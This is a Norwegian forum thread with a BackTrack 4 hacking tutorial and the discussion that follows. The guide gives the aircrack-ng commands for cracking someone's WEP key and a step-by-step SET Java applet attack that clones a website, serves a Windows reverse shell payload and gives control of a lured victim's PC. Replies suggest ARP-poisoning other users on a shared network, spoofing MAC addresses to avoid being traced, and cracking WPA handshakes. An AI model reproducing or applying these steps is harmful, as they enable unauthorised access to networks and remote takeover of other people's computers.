Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  34 6933
BackTrack er en linux distro basert på Ubuntu som er laget for hacking og har en samling av forskjellige nyttige verktøy. I denne guiden skal jeg gå gjennom de grunnleggende funksjonene i BackTrack.

Innhold:
1. Installasjon
2. Koble til internett
3. Oppdater BackTrack
4. Crack WEP med Aircrack
5. Social Engineering Toolkit (SET)

---------------1---------------
Installer BackTrack
1. Last ned BackTrack 4 ISO-filen her
2. Enten brenn ISO-filen til en DVD med f.eks nero eller til en minnepenn med UNetbootin
3. Boot fra det lagringsmediet du har brent ISO-filen på
4. Hvis du må logge inn er brukernavn: root og passord: toor deretter skriver du startx
5. Start installasjonsfilen som ligger på skrivebordet, hvis du partisjonerer manuelt er det EXT3 som er filsystemet du skal bruke, du trenger ca 7-15 gb (jeg har 12)


---------------2---------------
Koble til internet
1. Åpne et terminalvindu (Konsole)
2. Skriv inn

Kode

/etc/init.d/networking start
3. Skriv inn ifconfig
- ethX er trådinternet
- wlanX er trådløst internet
4. Hvis det er noen av de du mangler har du ikke driverne til det adapteret i BackTrack
5. Skriv inn

Kode

wicd-client
Ikke lukk terminalvinduete (da forsvinner WICD-Client)
6. Det skal nå ha kommet et lite tegn nede i høyre hjørne av to datamaskiner trykk på det og koble til det nettverket du vil, hvis det krever passord trykk på pilen under essiden og trykk på properties, skriv deretter inn passordet og hvordan type kryptering det er.


---------------3---------------
Oppdatere Backtrack
1. Start et terminalvindu
2. Skriv inn apt-get update
3. Skriv inn apt-get upgrade
4. Skriv inn apt-get dist-upgrade
Svar y på alle


---------------4---------------
Crack WEP
Først trenger du et nettverkskort som støtter monitor mode, jeg bruker "NETGEAR WG111 v2" ikke kjøp fra butikk i norge de har v3 som ikke støtter monitor mode kjøp fra ebay, den koster ca 200,-

1. Start et terminalvindu
2. Først må vi sette netverkskortet i monitor mode, dette gjør vi med

Kode

airmon-ng start wlan0
bytt ut wlan0 med det nettverksadapteret du skal sette i monitor mode
3. Deretter må vi finne ut hvilken kanal og MAC adresse nettverket har

Kode

airodump-ng wlan1
BSSID er MAC adressen til rutern og CH er kanal
http://bildr.no/thumb/690171.jpeg
4. Når man har funnet MAC adressen og kanal må man begynne å logge data fra nettverket.

Kode

airodump-ng -c 10 --bssid 00:C0:02:D2:C0:52 -w default wlan1
Bytt ut 00:C0:022:C0:52 med ruter MAC adressen, 10 med kanalen og default med essiden
http://bildr.no/thumb/690178.jpeg
5. Nå må man få mer #data, det gjør vi med

Kode

aireplay-ng -3 -b 00:C0:02:D2:C0:52 wlan1
Dette virker bare hvis noen er koblet på nettverket.
http://bildr.no/thumb/690179.jpeg
6. Når man har fått 30 000 eller mer #data kan man begynne og cracke WEP nøkkelen.

Kode

aircrack-ng default-01.cap
skriv inn essiden-01.cap (det er dette som blir lagret av -w så hvis du skriver abc blir det abc-01.cap)
http://bildr.no/thumb/690180.jpeg


---------------5---------------
En grunnlegende guide i Social Engineering Toolkit (SET)
I denne guiden vil jeg bare vise hvordan man bruker Java applet attack. Jeg kommer kanskje til å skrive en detaljert guide hvor jeg forklarer alt som skjer hvis dere vil. I denne guiden får du vite hvordan man skal gjøre det.

1. Start et terminalvindu
2. Skriv inn

Kode

cd /pentest/exploits/
3. Skriv inn

Kode

svn co http://svn.secmaniac.com/social_engineering_toolkit set/
4. Skriv inn

Kode

cd set
5. Skriv inn

Kode

./set
6. Velg "Website Attack Vectors"
7. Velg "Site Cloner"
8. Velg "The Java Applet Attack Method"
9. Skriv inn nettsiden du skal klone, jeg kloner http://www.google.com
10. Velg "Windows Shell Reverse_TCP"
11. Velg "shikata_ga_nai (Very Good)"
12. Jeg bruker å kode payloaden en gang
12. Bruk default port (trykk enter uten å skrive inn noe tall)
13. Velg om du skal lage payloaden til Linux og OSX i tilleg til Windows, dette tar litt lengre tid
14. Vent til du får opp "msf exploit(handler) > "
15. Nå er det på tide å lure folk inn på din IP adresse, den ser du hvis du klikker på WICD ikonet nede i høyre hjørne.
16. Vent til du får opp "Command shell session 1 opened ([Din IP]:443 -> [Offer IP]:4150)" så trykk [Enter]
17. Skriv inn

Kode

sessions -i 1
Du har nå kontroll over offerets PC og kan bruke alle CMD kommandoer.
Sitat av ynkey Vis innlegg
15. Nå er det på tide å lure folk inn på din IP adresse
Vis hele sitatet...
lukt litt på arp-poisoning du
Trådstarter
Jeg vet det, jeg tar meg av Ettercap+SET i en annen guide
Denne guiden likte jeg, veldig enkel for noobs som meg
Vil anbefale å skrive:
ifconfig wlan0 down
macchanger -m 00:11:22:33:44:55 wlan0
ifconfig wlano up (ikke sikkert denne er nødvendig, den er trolig i airmon-ng)
airmon-ng start wlan0

så slipper du at mac-adressen kan finnes
Trådstarter
Macchanger ser jeg egentlig ingen vits i å bruke, jeg tviler på at hvis noen kommer å ringe på døren min for å spørre om min jeg eier mac adressen som hacket seg inn på nettverket :P
Sitat av ynkey Vis innlegg
Macchanger ser jeg egentlig ingen vits i å bruke, jeg tviler på at hvis noen kommer å ringe på døren min for å spørre om min jeg eier mac adressen som hacket seg inn på nettverket :P
Vis hele sitatet...
A true hacker never leaves any proof.
Veldig bra.. kan man cracke WPA nøkler? med backtrack tingen?
Sitat av Anox Vis innlegg
Veldig bra.. kan man cracke WPA nøkler? med backtrack tingen?
Vis hele sitatet...
Ja, du kan gjøre stort sett det du vil innen "sikkerhetstesting" Men ikke regn med noe windows interface i programmene du kommer til å bruke. Det er ikke noe pek og klikk system akkurat.
Hei

Når jeg igår såvidt testet BT4 og sammen med mitt nye alfa wifi usb, bør da det interne nettverkskortet (?) være avslått, ikke aktivert?

Eller har det ikke noe å si om den er på?

D
Ordenens Seglbevarer
Ond^Sofa's Avatar
Sitat av DrD.O.C Vis innlegg
Hei

Når jeg igår såvidt testet BT4 og sammen med mitt nye alfa wifi usb, bør da det interne nettverkskortet (?) være avslått, ikke aktivert?

Eller har det ikke noe å si om den er på?

D
Vis hele sitatet...
Det har ikke noe å si så lenge du bruker riktig nettverkskort i kommandoene.
wpa cracking uten gpu er bare og drite i, siden på wpa så må wpa keys testes.

mini wpa guide :
1. sniffe 4 way handshake (vil si en bruker som logger seg wlan med rett password)
2.teste alle muligheter for og finne rett password på wpa nette.
Trådstarter
Jeg vil anbefale å skru av det interne nettverkskortet, av og til får jeg av en eller annen grunn problem når jeg har begge påskrudd :/
Macchanger ser jeg egentlig ingen vits i å bruke, jeg tviler på at hvis noen kommer å ringe på døren min for å spørre om min jeg eier mac adressen som hacket seg inn på nettverket :P
Vis hele sitatet...
Man kan lage seg et skript som automatiser prosessen,så man slipper og taste inn hver gang.
Og da bruker man såklart macchanger.
Nå er det mange år siden jeg lagde dette skripet,men fungerer fint ennå.
For et av de gamle og bedere nettverkortene som finnes DWL-G650.

Skriptet gjør dette.
Setter opp kortet.
Forandere mac adresse.
Setter kortet i monitor mode.
Starter og søke etter nettverk.

Kode

#!/bin/sh
wlanconfig ath0 destroy
ip link set dev wifi0 down
macchanger --mac=00:11:22:33:44:55 wifi0
ip link set dev wi#!/bin/sh
wlanconfig ath0 destroy
ip link set dev wifi0 down
macchanger --mac=00:11:22:33:44:55 wifi0
ip link set dev wifi0 up
airmon-ng stop ath0
airmon-ng start wifi0
ifconfig ath0 up
iwconfig ath0 mode Monitor
airodump-ng ath0
Dette var en bra guide.
Selv lurer jeg på hva jeg gjør feil da jeg prøver å logge ut fra backtrack 4-live-dvd-en jeg har bootet fra.Jeg gjør logout fra kde og havner da hos recovery-menyen hvor jeg skriver ¨halt¨. Backtrack avslutter men cd-rom-stasjonen med dvd-en åpnes ikke.På skjermen gis det beskjed at man selv skal fjerne dvd og stenge cd-rom stasjonen og trykke valgfri knapp for å avslutte,men cd-rom-stasjonen har alltså ikke åpnet seg(som den gjør i backtrack 3).
Har også testet kommandoer som logout,exit og eject.
Trådstarter
Villniss den store forskjellen mellom BackTrack 3 og 4 er at BackTrack 4 er basert på Ubuntu og passer derfor veldig godt å installere på PCen i motsettning til BT3 som ikke er like stabilt. Du kan prøve

Kode

shutdown -P 0
tror jeg det var, eventuelt skriv inn

Kode

shutdown --help
Hei og takk for svar. Har prøvd shutdown -P 0 samt varianter av poweroff kommandoen for å få ut dvd-platen, men uten hell.Kanskje poweroff og shutdown kommandoen må kombineres i en bestemt rekkefølge for att dvd-platen skal løses ut? Har prøvd å brenne iso filen til en annen dvd-rw plate også,men samme problem oppstår der.Som det er nå bruker jeg enden av en binders for å løse ut dvd-platen etter endt backtrack 4-sesjon.
Jeg la merke til at ved oppstart av backtrack 4 etter at jeg skriver inn startx
kommer en melding: ¨warning x process set to -1 instead of requested 0¨
Trådstarter
Jeg tror rett og slett at det er en bug med din DVD-rom, hvis du ikke får startet opp Windows fordi DVD står over HDD i bootrekkefølgen så kan du endre det i BIOS, ellers anbefaler jeg deg igjen og innstallere det (du slipper å avinnstallere Windows)
shutdown -h now
shutdown -h now stenger backtrack,men uten å åpne cd-romstasjonen,på samme måte som tidligere shutdown -P 0 og poweroff-kommandoen.
Har prøvd umount /media/cdrom0 fulgt av ¨fuser -k /media/cdrom0¨ men får melding ¨device is busy¨. da eject kommandoen kjøres.
ps -a viser heller ingen aktive prosess-id:er å bruke kill kommandoen på,mulig
at min nedlastede isofil av Backtrack 4 har bugger,men cd-rom stasjonen tror jeg er ok siden den virker under backtrack 3 og i windows.
Prøv å tvinge den til å unmounte:
sudo umount -f /media/cdrom0
sudo umount -f /media/cdrom0

Får output:

umount2: Device or resource busy
umount: /media/cdrom0: device is busy

Må fortsatt manuelt åpne cd-romstasjonen etterpå.

Virker som automatisk åpning av cd-rom stasjonen ikke er med i min versjon av backtrack4-final live-dvd.
Eller at det ikke er installert drivere til din CD-rom stasjon i backtrack
▼ ... over en uke senere ... ▼
Trenger litt hjelp her. Prøver å sette opp en VM med BT4 på, for å kunne ghoste den over på en laptop mha FOG (har ikke DVD-plater eller usb disk). Skulle være grei nokk sak det, men ser ikke ut til at jeg mottar DHCP offer fra ruteren (noe som virker på andre maskiner bl.a. host). Adapteret er satt til Bridged, og replicate physical i VMware.
Trådstarter
Jeg har rett og slett ikke peiling på Virituelle Maskiner, jeg prøvde å bruke en sånn i starten men alt hang seg når jeg kjørte flere ting samtidig så jeg installerte BackTrack på datamaskinen i tilleg til Windows, du kan eventuelt bruke en live minnepinne, men da får du ikke lagret noe fra gang til gang.
Ordenens Seglbevarer
Ond^Sofa's Avatar
KAn man installere BT4 som dualboot fra Live-cden, uten å laste ned eller tulle med noe ekstra?
Sitat av Ond^Sofa Vis innlegg
KAn man installere BT4 som dualboot fra Live-cden, uten å laste ned eller tulle med noe ekstra?
Vis hele sitatet...
http://www.offensive-security.com/vi...ack-vista.html

Burde gjøre susen.
Ordenens Seglbevarer
Ond^Sofa's Avatar
Sitat av Dyret Vis innlegg
Vis hele sitatet...
Prøvde å kjøre den samme installeren rett fra GUIet til BT, resulterte i feilkoder fra bootloaderen til BT - samtidig som Windows 7 nekta å starte.
Trådstarter
hva var feilkodene og hva er det som gjør at windows nekter å starte?
▼ ... noen uker senere ... ▼
Jeg sliter med å oppdater BT. Når jeg skriver inn apt-get update får jeg feilmeldinger. Se vedlegg.
Kan nevne at jeg sitter offshore med statoilnet der jeg må bruke proxy, misstenker det er den som skaper krøll? Noen tips?

BTW, jeg bootet BT via USB stick for så å legge det inn og kjører dualboot. Kan lage en liten how to om noen ønsker det?
Sist endret av per-ulv; 28. august 2010 kl. 03:16. Grunn: Skriveleif
hva kan jeg gjøre da jeg har gjort hele guiden? vet jo cmd, men hvilkne muligheter åpner det for meg ? btw sitter på hyble nett, der det er mange maskiner som "deler" nettet, og kan jeg gjøre noe med de? hva kan jeg ødelegge for dem ?
Trådstarter
per-ulv, det er nok antakelig vis proxy som er problemet, da den antakelig vis ikke kommer i terminalvinduet, prøv dette: http://blog.mypapit.net/2006/02/how-...ntudebian.html

sinquah: du kan alltids kjøre ARP-Poisoning og for eksempel sniffe/endre på hva de søker på, bare husk at jeg ikke er skyld i noe du gjør.
Sitat av ynkey Vis innlegg
per-ulv, det er nok antakelig vis proxy som er problemet, da den antakelig vis ikke kommer i terminalvinduet, prøv dette: http://blog.mypapit.net/2006/02/how-...ntudebian.html

sinquah: du kan alltids kjøre ARP-Poisoning og for eksempel sniffe/endre på hva de søker på, bare husk at jeg ikke er skyld i noe du gjør.
Vis hele sitatet...
Har prøvd det det der, men får det fortsatt ikke til. Men no biggi, skal snart på landejorda, så får det nok til på eget nett

Fikk det til, men det så ut til å være en bug eller noe, for når jeg skrev:
export http_proxy=http://usernameassword@proxyserver.netort/
get-apt update

fikk jeg samme feilmelding, prøvde så å skrive:
export ftp_proxy=http://usernameassword@proxyserver.netort/
getp-apt update

samme skjedde, så jeg prøvde en gang til med:
export http_proxy=http://usernameassword@proxyserver.netort/
get-apt update

og vips så funka det faen meg
▼ ... over en måned senere ... ▼
har innstallert backtrack 4 på usbpenn, har klart og cracke wep nøkler, men skal jeg gå fram på samme måte med wpa nøkler?
Har du en bra ordliste nedlastet kan man teste og kjøre aircrack mot handshake filen, men gpu metoden skal visstnok være mer effektiv(tror også det finnes et program som heter elcomsoft som visstnok finnes en tråd om her på forumet).